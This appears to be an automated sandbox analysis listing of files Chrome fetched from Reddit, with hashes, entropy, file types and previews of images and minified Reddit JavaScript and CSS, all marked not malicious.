                                                  Preview:.PNG........IHDR...(...(...... H_...=PLTE....P..L..L..P..L..L..M..M..L..L..L..K..M..L..L..L..M..M..K..L.....s........i.....Z..`....T..E.....w..e............k...........}.....~.....a..{..x..u.....................\..P............p..o..b..V......N..!.......................[.....q..X..G..E..4./......q..n..A..,..............m..`..S.R#. ......~..|..y..`..\..>.:.&.."........x..m.P<.eE.@0..[..o..G..?.e,.>...k..H..H..A..@..:.v0.l,..........r........._..Y..R.M..0../.........................l.....`..x..`..[..C..i.N0..[..J..9..g..e..J..I..C..>..9.y9.j2.[,..+..)..&..#....\........~..f..E.....9w......tRNS. ......`.@`0p...P.pA.....zIDAT8.....@..M.....L.h..."*`.QD.N.v...{...{....m.f..q..}f2.3......&..G..?..<t.Uk..fm._..ME..J.h..$..S..h.;u|B&?>.9...R....K...E.|G.Ea.2RD...........V.Ee...u.J5!:......M.=..GV .h.L.=...aI(+...M..um.F.9h.'t.i..G...f..<.E.NR%d.I.O^......C~i..d........]....1......+0w.,.A.....Ef&..=~.SI.u.eFm.1WsX...6.gb@].....s5.....bS$.C...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2435)
                                                  Category:downloaded
                                                  Size (bytes):2490
                                                  Entropy (8bit):5.1031872458854375
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B125BF78B099E4853A55D8307679AFC9
                                                  SHA1:58D822C18040A58632EE15954F27353EC8BFAEC1
                                                  SHA-256:EDCAAF5748F19CCD68B97BE397E6F13D92A1C7A9150EBE19CFA7427E3578E094
                                                  SHA-512:BAA6B81EF261998CBB188BE06DE5E2E59160A06A442C57609AB82D8C4BFB13320C4BACD2FCD289D4B70771C9146D392FF3CCF080B556266B804035E2EA0A8E36
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/award-controller-7d9d8182.js
                                                  Preview:import{P as i,T as e,r as t,bd as s,s as a,be as r}from"./shell-4994f581.js";import{a as n}from"./awardsTelemetryState-36bf2914.js";var o;!function(i){i.Banner="education_banner",i.Dialog="education_module"}(o||(o={}));class d{constructor(e){this.isActivatingExplainer=!1,this.handleExplainerClosed=({explainerId:i,dismissed:e})=>{this.resolver&&this.resolver.explainerId===i&&(this.resolver.resolve({dismissed:e}),this.resolver=void 0)},(this.host=e).addController(this),this.pubsub=new i(this.host)}hostConnected(){this.pubsub.subscribe(e.ExplainerClosed,this.handleExplainerClosed,!1)}hostDisconnected(){this.pubsub.unsubscribe(e.ExplainerClosed,this.handleExplainerClosed)}getExplainerDialogByExplainerId(i){return document.querySelector(`[dialog-id=explainer-dialog][data-explainer-id="${i}"]`)}async showExplainer({explainerId:i,explainerType:e,correlationId:r}){if(this.isActivatingExplainer||d.activatedExplainers.has(i)||!e?.endsWith(o.Dialog))return{dismissed:!1};try{this.isActivatingExpla
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x1138, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):28800
                                                  Entropy (8bit):7.990091702632229
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:035A879D5235F2B57FE43E4F3FE0BF4B
                                                  SHA1:084288DCCD1A3819E675F4751B599EC36C0C527B
                                                  SHA-256:4ECEA20678E2BF101BD82F4910B6B227F29645DD991518771C4768DAD9DCBD9A
                                                  SHA-512:EAC7E9232D5DB8C593738304B406643983D09B69817158FBE38084394C1C84CD06FF8561B44B75E2ADDE856C189AD2F2519BDA9BAF7AB0E4A33B76A642378CD9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/good-thing-he-got-it-on-video-v0-dWhybHptZWJrZHdlMdwCdYUZOd8D-U3HcFHkkw01u6aa6XAKlgKEkb9BkCQF.png?width=640&crop=smart&format=pjpg&auto=webp&s=345ae6c0bd1366c3032ddf5ffb3c49d597d08573
                                                  Preview:RIFFxp..WEBPVP8 lp..P....*..r.>Q(.F#..'..(...in....W.s..y.'...Us7..I#$%.[W....._D`....|..\..~............G...w.....CS.i.C.[..~...._._.>.[..._C..~y.....?...|..3.........W.....~0%E....K....o....C.O.~.?.r.P+.K..8..............P.\'...-8K8...)@.O..4Zp.q#.(R.p.W.h..,.F.P...>.(.i.Y.$.J..}\Q.....IB......E..g.0..(...qF.N..$a%.P......%.H.J..\'...-8K8...)@.O..4Zp.q#.(R.p.W.h..,.F.P...>.(.i.Y.$.J..}\Q.....IB......E..g.0..(...qF.N..$a%.P......%.H.J..\'...-8K8...)@.O..4Zp.q#.(R.p.W.h..,.F.P...>.(.i.Y.$.J..}\Q.....IB......&.M.@.jp.6.H.t.."r..].0..#..5pa]...~2.=...)|.....*...Qte0w..s(...............]........l..A.:.-..c...`.bj....E..j.T...!]...v}..Z.+4DtD4h..p.^.=5....IQ..;...4..?.."......t...8.."..d[l.UL...BS.G.n..ZRp.K..k....I..b.....1.'8..}g.t..*....zT.$....F.......I....D"....[.P..>_H.....4.x....Y.\I....|.N..!=+.w.>.r.g....f...e}'(i..4]j1r.W:.[F0......6rf.....J......zQ.{.L.~....;.o.....@.1....2S.#...8~.....LU.....gk"s....az....,...].h.bq...B.$..r.QZ.P..g..ms..:
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2432)
                                                  Category:downloaded
                                                  Size (bytes):2487
                                                  Entropy (8bit):5.316502497861864
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DB8ED75FF3D288932F9AF6A167511EDB
                                                  SHA1:DED083CB49AC450E0E83BD1D614995992816705D
                                                  SHA-256:AF2AFACDED1A5CD50FBB72B2E2C2D6095AEE80DBC0915F5E20A92D725DDB841D
                                                  SHA-512:6D2481381B3E30243E89064A9EF3E12FACF3A9A904135453E88E3A034BE0A2ED86790F9B93F9AA73AA7F975811237337E2CB3F9127E9A4F91212E89F6F864B0F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/profile-creation-61d368d7.js
                                                  Preview:const t="overview-box-value",e="profile-dashboard-performance-overview-content",a="profile-account-stats-content-id",s="offsetUnit",o="offsetValue",n="/profiles",r="reddit_pro_onboarding",i="profile-followers-modal",l="profile-active-subreddits-modal",u="profile-contributions-modal",h="trend-monitoring-add-keyword-modal",L="trend-monitoring-manage-keywords-modal",f="delete-keyword-confirmation-modal",c="REDDIT_PRO_PROFILE_PIN_POST_COACHMARK",M="REDDIT_PRO_SHARE_BUTTON_COACHMARK";var d;!function(t){t[t.Hour=0]="Hour",t[t.Day=1]="Day",t[t.Month=2]="Month",t[t.Year=3]="Year"}(d||(d={}));const p=t=>({unit:d.Day,value:-t}),v=t=>({unit:d.Month,value:-t}),m=(t,e)=>{switch(e.unit){case d.Hour:return((t,e)=>{const a=new Date(t);return a.setUTCHours(a.getUTCHours()+e),a})(t,e.value);case d.Day:return((t,e)=>{const a=new Date(t);return a.setUTCDate(a.getUTCDate()+e),a})(t,e.value);case d.Month:return((t,e)=>{const a=new Date(t);return a.setUTCMonth(t.getUTCMonth()+e),a})(t,e.value);case d.Year:re
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):4837
                                                  Entropy (8bit):7.947095600301191
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D457BDFFF362D2161C0F70A87A0BE6D4
                                                  SHA1:31C8D5E87DE03708797BFA0266EA331B4D110149
                                                  SHA-256:15658616B8151DD7D5AF40C7D03588B778AA60233CC76169E690C4179E68B22D
                                                  SHA-512:100CC3C103CAA1F21E069A8D57AD08400310F4E7F1ACFF758B00D7D3E346BDDA94A9962C71151CADD4E6BB2E1C36DFADCE6B7DBE81C7B2F91BEBF70C455FA566
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...`...`......F......PLTE..........G>8.........534yut...=<<iffSPO..}...*,.FEE`^X.........OOK...........von99:0$....))*......\]\......zpg;86...WUTwvs...A@@......(&$... ..ytmJII...766&!.SRQJHG...=96plg%%%B@@..}_^_)''965...}YXXJGDljj...544GCAb_]...SOO}|y...mkl;9:...]WWgee.....z...RPP/./...spm...fc`;::......NJJ...qkh.........{wt......E@?.SNM.....fdb......vsq................ojl......xru....[L.........OHH......z|_TT......[QQ>:;........................E??........JDE.h]..uUMM.........hVO...cYY...........q..........................733...qcavge...j]\......mnL- .....j.ur.~.sYQ.6.....zki.Y.....e`e.T+....lc......zw.xi........~h....H.>...b6.mG.JJ....oo...b..aR...qno7 ...ZF>....m[....}X}mk.G%)((.......r=.......`..\..e..LhMB............R7.....`a.hh...`....tRNS...........................!$%%&&(-0167;>ADFHKKTWXY[`ffimqu{|...................................................................+.@.....pHYs.................IDATx.Y.|S.y?M.jb ...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2612)
                                                  Category:downloaded
                                                  Size (bytes):2663
                                                  Entropy (8bit):5.239840646106045
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8058425CE50C6509CCF67BA42203A608
                                                  SHA1:69A78F3A318FD3F1A6EA5DE42C6419976712F719
                                                  SHA-256:E45597BAE37132AB2F4BB39FCEE907EB8B81C934E0662ABBEB92964503BA3218
                                                  SHA-512:72EACB4696DCBD30BADA335776A9B637EAC567F026CC123CDBE80BFAAECD2C966CB88D9BA8A982B602F67EEC0DA0158A739CB6385F6CF66EEA6FD768AE0AD168
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/render-toast-b6f77e7e.js
                                                  Preview:import{_ as t,e as a,aZ as e,a_ as s,n as o,E as n,c as r}from"./shell-4994f581.js";import{s as i,a as c,x as l,B as d}from"./icon-4d9be652.js";let h=class extends e{constructor(){super(...arguments),this.reporter=new s(this)}};var p;h=t([a("faceplate-alert-reporter")],h),function(t){t.TOP="top",t.BOTTOM="bottom"}(p||(p={}));let v=class extends i{constructor(){super(...arguments),this._fading=!1,this._events=new n(this)}static get styles(){return c`:host{display:flex;align-items:center;box-sizing:border-box;min-height:var(--rem64);border-radius:var(--radius-lg);width:400px;max-width:calc(100vw - var(--radius-lg));padding:var(--spacer-sm) var(--spacer-lg);background-color:var(--color-neutral-content-strong);color:var(--color-neutral-background-weak);font-size:var(--font-14-20-regular);opacity:1;transition:opacity .3s}:host(.hasAvatar){padding-left:var(--rem16)}:host(.hasIcon){padding-left:var(--rem20)}:host(.hasAction){padding-right:var(--spacer-md)}:host(.hasAvatar)>slot[name=avatar]{p
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4458)
                                                  Category:downloaded
                                                  Size (bytes):4526
                                                  Entropy (8bit):5.2827468406193
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5112DBB53198E03289B7640E7248D7B4
                                                  SHA1:F0B074BFFB4B60A2DFF4493DBA371AA56B1743CE
                                                  SHA-256:4FFC75E27D627BE14E472F6C14E0CC8D63DAFEC267CD987F84D7679C20B99C41
                                                  SHA-512:8F4DDC818977749D6422705EE3044E867B91DDFD66031598CCCEE725B9803FAC07DAFE2D19EFF069B5E340EA39E3616759E73DBA5BA0ACC9B3DA1B24A281B061
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-status-bottom-sheet-a47bf0a8.js
                                                  Preview:import{t,_ as e,n as s,e as o,b as i,a,I as r,Z as n,u as l}from"./shell-4994f581.js";import{a as d,s as c,x as m}from"./icon-4d9be652.js";import"./faceplate-hovercard-74cbfc29.js";import{S as p,A as h,N as u}from"./community-status-telemetry-7d0e84ad.js";import"./app-selector-client-js-489f074c.js";var b;!function(t){t.small="small",t.medium="medium"}(b||(b={}));let y=class extends c{constructor(){super(...arguments),this.size=b.medium}render(){return m` <button class="flex items-center justify-center p-0 m-0 border-none rounded-sm h-[var(--emote-btn-size)] w-[var(--emote-btn-size)] bg-transparent hover:bg-neutral-background-hover cursor-pointer"> <slot class="emote"></slot> </button> `}};function g({pageType:t,url:e}){return{page_type:t,...e?{pane_name:e}:{}}}function f({subredditId:t,subredditName:e}){return{id:t,...e?{name:e}:{}}}y.styles=[d`:host{--emote-btn-size:2.25rem;--emote-size:1.75rem;display:block}:host([size=small]){--emote-btn-size:1.25rem;--emote-size:1.25rem}.emote::sl
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3194)
                                                  Category:downloaded
                                                  Size (bytes):3249
                                                  Entropy (8bit):5.133137345174963
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7CD6EBD271343882B54814434ACF5291
                                                  SHA1:50BCCD6E4BD84D0DAB46F1A2E34C88067C7A4B02
                                                  SHA-256:A66B09B9C5153A8C2829D9E8E43D15935587F9D7F3BCC196442E75DF6721482E
                                                  SHA-512:70275347ABB1B9FB1F6217775BC482D0E3C988E05BE39E59E9E5806D542E26BF425ABA00D05AA212D7A2D7891077E1A0461A4C71942719A80D6252B03C8F853F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-option-67bfebc3.js
                                                  Preview:import{_ as e,aR as t,n as s,e as i}from"./shell-4994f581.js";import{s as o,a,x as l,z as d,A as n}from"./icon-4d9be652.js";import{H as r}from"./club-award-confirmation-client-js-b22d6f4f.js";class c extends(function(e){var t;return(t=class extends e{}).VERSION="unreleased",t}(o)){}let h=class extends c{constructor(){super(...arguments),this.selected=!1,this.disabled=!1,this.current=!1,this.emitter=r(this),this.trustedUpdate=!1,this.handleSelection=e=>{e.stopPropagation(),this.disabled||this.dispatchSelectRequest(!this.selected)},this.onClick=e=>{this.handleSelection(e)},this.dispatchSelectRequest=(e=this.selected,t)=>{this.emitter.dispatch("select",{bubbles:!0,composed:!0,detail:{option:this,selected:e,allowSingleDeselection:t}})},this.resetSelection=()=>{this.matchedText="",this.removeAttribute("hidden"),this.selected=!1,this.dispatchSelectRequest()},this.visualFocus=e=>{this.current=e}}connectedCallback(){super.connectedCallback(),this.addEventListener("click",this.onClick),this.add
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2629)
                                                  Category:downloaded
                                                  Size (bytes):2683
                                                  Entropy (8bit):5.086601218377156
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F380114C84437EC5467A4E4613D7A22F
                                                  SHA1:43F5432107649B9098EF32DD99B8D677BCB55211
                                                  SHA-256:EFFD04705FBEFCCCBE1B53D190641BD8B19B5C376D315CB68F833FC26C4EFC3B
                                                  SHA-512:6982B022261FEF1F0220A0AAB66B1F9533D556E13A6EF94515396FA888707702368B34AC8A5554A6B1EA506A3AE74FCCA3913B8F37C80414577A8C0F7BC450A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/base-translator-b41f5754.js
                                                  Preview:import{_ as t,av as e,g as a,aw as n,bK as r,aL as s,aF as o,bL as i,bn as l,bM as c,bo as h,bN as u,ax as g,n as d}from"./shell-4994f581.js";import{s as m}from"./icon-4d9be652.js";class T extends m{constructor(){super(...arguments),this.translationContextValue=n,this.translationLanguage="",this.reportMetrics=!1,this.metricsScenario=r.PageLoad,this.objectTranslationCache=new Map,this._requestController=new s(this),this._isFetchingTranslations=!1,this.trackEvent=o,this.logError=t=>{i({error:t.error,metadata:t.metadata,element:this,componentName:this.tagName.toLowerCase()??this.constructor.name})}}updated(t){t.has("translationContextValue")&&this.onUpdateTranslationContextValue(t)}onUpdateTranslationContextValue(t){const e=t.get("translationContextValue"),a=this.translationContextValue.isTranslationActive,n=e?.isTranslationActive;try{void 0===n&&void 0!==a?this.metricsScenario=r.PageLoad:void 0!==a&&(this.metricsScenario=r.ToggleChange),!0!==n&&!0===a?this.onTranslationsEnabled():!1!==n&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):4412
                                                  Entropy (8bit):7.873618000769762
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2377877FF2DC59CDC7A3AF9D34873845
                                                  SHA1:BA1F3E391E2ED16C9CF451009BF47CE9339F82C0
                                                  SHA-256:3DC066ED1E9EF1A7E4FA7D342856D6CE765F234DE20D8C8D11AABD93F07EF77A
                                                  SHA-512:67A82C4306CE5E070E7031616EAFCF6585D438B306C1DEC21E7D7CBD720843BE0671A3451E599DCC7D3255BB461B2EF17D71E0B7BD9FE9C9DD6252690FCE40C6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...`...`......F......PLTE.......H.....9.v".p....+.|..)..M..%.i.B...{..*.{........@.N.a.h...t...4.5...s....t........Y..,...............I.u.f.......)fgh....#pBAA..W... O..........'6d..-...4$..F*.:..c.O.QVWX...y,-(.... ...(......;.......f........I..2.vwx....I.A.o.N...nq.)..o..}&.YwE[...e.X...;.{..... .3....'$&H....._^_...B.^^..;:;..<..d.x...,D|..`A....~..f...d.@...=..}}~..&.UP........P...S./EgG..,.l......=G...^Y..?+..1...J.:"Y......!...3....opo...c98..U ).....G.I.H.Z,.'?....#{.vx.')IIHOOO.........$0.%*A.....m.`..D.u.T6...hpx..j.........*x.?..g.;...0..3.......w.>.....*...lTRx...]..5...:..}.L..VBm......#...o.........`..OK+v.k.'!...2.R.U6.X.~...M.A.G..6...._..`.\.S*+..W..jP.y......Z..T.S.D..<;*,t.;...x...v...UP55V..8.J...Z.....$.^....'3.j..hg...!|W..$.. ..P.h.WG}........Z..6554D-........pHYs.................IDATx..{..e... '..+..2.r........`.^9#C..<...H...........AC....V......oYy.0...Z..dym.......<.|>.O..].9..|.....^..?bq;.;.;.;.;......W;8.R....G.@.#...u. ..h
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):862
                                                  Entropy (8bit):7.672060411029372
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BAAFD3F87A9E0BCFB0BB498295FEA6C2
                                                  SHA1:4477C372A13387181C83AB90C5B6E4D221296DBE
                                                  SHA-256:1A2BC0EC015A5D174665008E30A4BA1E0D4A004305C5089A1B17C29BDE9A3A4D
                                                  SHA-512:1DE451AFF2AEE952FC1396793FA68CCF6C7723F5680198E3112238EE8B9A7EDE05800ECA2441934D3640E6B6A08B1E13F9FA1893200CD02FBFAAE1035C2F2799
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2rfsw/styles/communityIcon_143o7qme59f71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=824332071c5e9922d6d4ca5859fa89a20873f9ce"
                                                  Preview:RIFFV...WEBPVP8X......../../..ALPHB....`.6.........>....?(rFdTJ..F...y..N+.......T2N..R%U...$H.1..m..g.VP8 ....0....*0.0.>E..D"...kn.(.D..T....?.y...m......?....M.....@......B............W.......~He........?A..~....pe...Q...t!:.e<.%.1>..."PC...`..K..l....`.!...~.....r*.;.._...).E.....]...u..{..w.4.d.M.'.......:c."m.Lu.hs.VI.~c....?b#...Y.#...i.PyW..:.H...@vpq....e/g.{z.lBO..*.......s..`.....T..h...]K..._@`....",R.h.%...Lp.^=..|.p/U9...d{X..........A.....RQ>.k.=...|.v.g.... .0..]n.?...^../k...Y..!Z.\....8...m.#...[l....}>M...6.,8@....9U......ns..5h[.....= ~=A.n.Q..C.|..`......)E'hG.w..>F....;.I....0g#..P-W3..$U..I{p..:.l....0..E.W....|......c./a$....=......wY....?...3a4...c.!.....v..<......l.Fg...)...v.a_c........h......4.F....wV}.....7l....uQ..[7..w.Lo..Z{xk.1...o.X....H.($.0.F..Ue.>.C.ZE..d.....^+,.....b6....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 320x179, components 3
                                                  Category:dropped
                                                  Size (bytes):12756
                                                  Entropy (8bit):7.9647204877534525
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BAA7846629DC2C878A0754D1CC48D44E
                                                  SHA1:0C1DA551A9C032B3F028DCA3F3CD4E8CDE3AEDE4
                                                  SHA-256:880CBDC67819D2ABE7B0290A88AD8E74982B4C367D822F66D84CDC1E5334A46D
                                                  SHA-512:757B6ED15CAF012C0F3FFFA3F011AD45696511680C55F5AAB7D497180A5345123F4585142FB69CDD5EC650A0FA227182FA158F29F062FC21C5B784F2C46595B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@.."........................................<.........................!1A.."Qaq.#2B..3b....$Rr..Sc4Ds..................................1........................!.A"12Q.Bq.#4ar..$C...R............?..Na.^?..i.......b..i:p........3....y.)...~..\}...T.#2.}.a/?.....;\..$~..*^c..R..#..7.E..=MH^f_.-..P.'...Z...G.. .C....Hq.M..`p.9.........@?j.....<...lT..:..j.@..v.@.!:w..?yl?..K.T`qDj......5.(<`.....*d..r5..n).1!..j....\]..........,i..'.....T.<........._\~.......3.t(+...Xi..B..y..Z...r..3.../~n.(?w....*v.zuH.g..........CA.wf6p.`pB.5...R..BN.@.......^V.....Q...2RR..@_$/<n8..!.W...6.xw.......u]5...G.*:.0}.y....)]....8..@....B8...K.w.#deO.I.<.+.U..n$.ML....D*"........wj[P...a... .L..#.D.....V.1_Z..[.....#..9..A...J.8....q@GE.-u.......PQG..X..EKBc.>..*.C...pGsL..RG\m'..@4..........R,!/2..w....P`....c.b..v..1.`g....m...$....(....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5434), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):5434
                                                  Entropy (8bit):4.8461000092773965
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C0B1DA7AF8487F9AB4D9803EDD1E51E1
                                                  SHA1:26A30D046F3421FCD3F3CA715E2B4A5B749076E2
                                                  SHA-256:2272CFB9D68A1D7532E0C995ED8B784A5333A3550FA6F5A60A8CC089F7A2E009
                                                  SHA-512:CE761F19A6B0AA0B8C172B4E9DB4FE076C235B74424BD8B05D8BF29B5D501F1833EBDFF5B30BC1DCE044B7689745DA12A2192082EBE7FD944CCFD6F3066C166B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/hui-grid-client-css-b37067be.css
                                                  Preview:flex-left-nav-container{--hover-curve:var(--expand-curve, cubic-bezier(0.65, 0, 0.35, 1));--unhover-curve:var(--collapse-curve, cubic-bezier(0.87, 0, 0.13, 1));--hover-duration:var(--expand-duration, 300ms);--unhover-duration:var(--collapse-duraction, 250ms);--flex-nav-closed-size:32px;--flex-nav-expanded-size:272px;--closed-floating-translation:calc(var(--flex-nav-expanded-size) * -1 + (var(--flex-nav-closed-size)));--open-floating-translation:0%;--left-nav-box-shadow-none:0 0 0 rgba(0, 0, 0, 0);--left-nav-box-shadow-hover:var(--elevation-lg);--left-nav-min-height:calc(100vh - var(--shreddit-header-height));--flex-nav-z-index:100;contain:size,layout;position:relative;box-sizing:border-box;border-right:none!important;min-height:var(--left-nav-min-height)}@supports (height:100dvh){flex-left-nav-container{--left-nav-min-height:calc(100dvh - var(--shreddit-header-height))}}@media (prefers-reduced-motion){flex-left-nav-container{--hover-duration:0ms;--unhover-duration:0ms}}flex-left-nav-co
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3558)
                                                  Category:downloaded
                                                  Size (bytes):3639
                                                  Entropy (8bit):5.138852634687305
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B13CA6DFBE1F39983FD406A061421DC4
                                                  SHA1:9BA4C7A283B47207F9D6CC7E2DBC98B46823A963
                                                  SHA-256:09FE2043959D5D40DC1870799AED921D10718BDA00563FB5FEE4EACF3DCA37D4
                                                  SHA-512:36E699F59ACB5834E4FC98B15D5C95387CEE67598ACC1273B0CB4ECCCB8B5A0B068EF684B5D2EAC2FC84CEA37C419840616876D0137AB6911F6B85B15ABF5817
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/search-results-dropdown-modifier-client-js-b0d36951.js
                                                  Preview:import{bE as t,aK as e,E as s,aF as n,aW as o,aX as i,aV as r,_ as a,n as c,e as h,Q as l,U as v}from"./shell-4994f581.js";import{C as u}from"./post-consume-tracker-e4186985.js";import{s as p}from"./icon-4d9be652.js";import"./links-27a3f3ef.js";import"./club-award-confirmation-client-js-b22d6f4f.js";function d(t){return t?.split(",")}function E(t){const[e,s,n]=t.split("/");return{source:e,action:s,noun:n}}function g(t,e,s){return()=>e.forEach((e=>{const{source:o,action:i,noun:r}=E(e);o&&i&&r&&n(t,{source:o,action:i,noun:r,...s})}))}class C{constructor(t,e){this.host=t,this.onChange=e,this.host.addController(this)}hostConnected(){o(this.onChange,{immediate:!0})}hostDisconnected(){i(this.onChange)}}class k{constructor(t,e){this.host=t,this.onChange=e,this.host.addController(this)}hostConnected(){r.subscribe(this.onChange)}hostDisconnected(){r.unsubscribe(this.onChange)}}const b="search-telemetry-tracker";let f=class extends p{constructor(){super(...arguments),this.trackingContext={},this
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (627)
                                                  Category:downloaded
                                                  Size (bytes):678
                                                  Entropy (8bit):5.309853107792574
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C196C52C4CB2496A8BC21C591443F49A
                                                  SHA1:409DC4360BE02D6D87A44D744652DCAD6A53AF0F
                                                  SHA-256:A448C428CFADB2766528D2EB6369E288DF4C72C19DDF6DC349CE625BB20DCAC9
                                                  SHA-512:ABB2725B8E7F161FEAD98456F9D22F4CDD053E45AF5AC5C1488600719D6C525B961A0F3E701DF3F957ACE0DD097AA1F96847B01F95C1B0F419A804C8B6BF51B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/ads-carousel-bdc648e7.js
                                                  Preview:import{_ as e,D as t,n as i,e as r}from"./shell-4994f581.js";import{F as s,I as o}from"./community-club-highlights-client-js-c7c6ec6d.js";let p=class extends s{constructor(){super(...arguments),this.inset=o.NEXT,this.render=()=>super.render()}willUpdate(e){e.has("deviceType")&&(this.pageWidth=this.deviceType===t.MOBILE?"90%":"75%")}};e([i({type:String,attribute:"device-type"})],p.prototype,"deviceType",void 0),e([i({type:Boolean,attribute:"exceed-margin-allowed"})],p.prototype,"exceedMarginAllowed",void 0),e([i({type:String,attribute:!0,reflect:!0})],p.prototype,"inset",void 0),p=e([r("ads-carousel")],p);export{p as A};.//# sourceMappingURL=ads-carousel-bdc648e7.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (633)
                                                  Category:downloaded
                                                  Size (bytes):677
                                                  Entropy (8bit):5.21014029971731
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:022D4E3CC63A826772FF51FDC148C61D
                                                  SHA1:2901822D76BA7A05E17AE6C1DA82C578F5A40F54
                                                  SHA-256:41FC33EA58F01E18A3087B90C75046BE35311942EED47C0A390CF3403321C404
                                                  SHA-512:75DB273B7BAF59E54554C22B5AD2F6AAD2F44915B03498FF1C4E36DCB41E0654E4A37E196C35D2C9FBF0E57B887680360EEC0B1F6BAAC314807E98361F226B54
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/feeds-efba5867.js
                                                  Preview:import{w as e}from"./shell-4994f581.js";const a="post-deletion-modal",t="subreddit-mute-modal",r="subreddit-right-rail__partial",s="/svc/shreddit/:subredditName/community-highlights",d={[e.Card]:{get description(){return"Card"}},[e.Compact]:{get description(){return"Compact"}},[e.Classic]:{get description(){return"Compact"}}},i="shreddit_feed_auto_refresh_web3x",o="shreddit_feed_auto_refresh_mweb3x",_="shreddit_feed_manual_refresh_web3x",m="shreddit_feed_manual_refresh_mweb3x";var u;!function(e){e.MANUAL="manual",e.AUTOMATIC="automatic"}(u||(u={}));export{u as B,s as C,d as F,a as P,t as S,r as a,m as b,_ as c,o as d,i as e};.//# sourceMappingURL=feeds-efba5867.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (31580)
                                                  Category:downloaded
                                                  Size (bytes):31654
                                                  Entropy (8bit):5.27048032707239
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9E46D2674C2AC59D244489B1EB10EF9F
                                                  SHA1:D0DFF8C9170645BC7C42137C59ED72546AED12CE
                                                  SHA-256:F99CE05EDC10903F63F6D4C3FCDF5DE7B2695BF8E9AA79FFF180ADD4B7A9DEBD
                                                  SHA-512:E209890846BB1A9659E786BF32254372D18DB1E5AF63492B9FFDAFE2426D066753D99F312B4D04675403CF935E59E41C1F4C921B44C4E7CE59DD527CA7E431C8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-club-highlights-client-js-c7c6ec6d.js
